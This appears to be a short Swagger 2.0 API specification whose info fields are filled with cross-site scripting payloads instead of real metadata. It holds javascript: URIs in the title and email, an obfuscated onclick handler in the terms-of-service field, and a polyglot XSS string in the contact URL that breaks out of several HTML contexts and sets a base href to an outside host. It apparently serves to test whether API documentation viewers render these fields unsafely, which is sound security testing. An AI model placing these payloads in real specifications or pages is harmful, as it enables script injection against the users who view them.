swagger: "2.0"
info: 
  title: "xss javascript:alert(document.domain)"
  description: "Please to click Terms of service"
  termsOfService: "<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme"
  contact: 
    name: "API Support"
    url: "JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->"
    email: "javascript:alert(document.domain)//"
  version: "1.0.1"
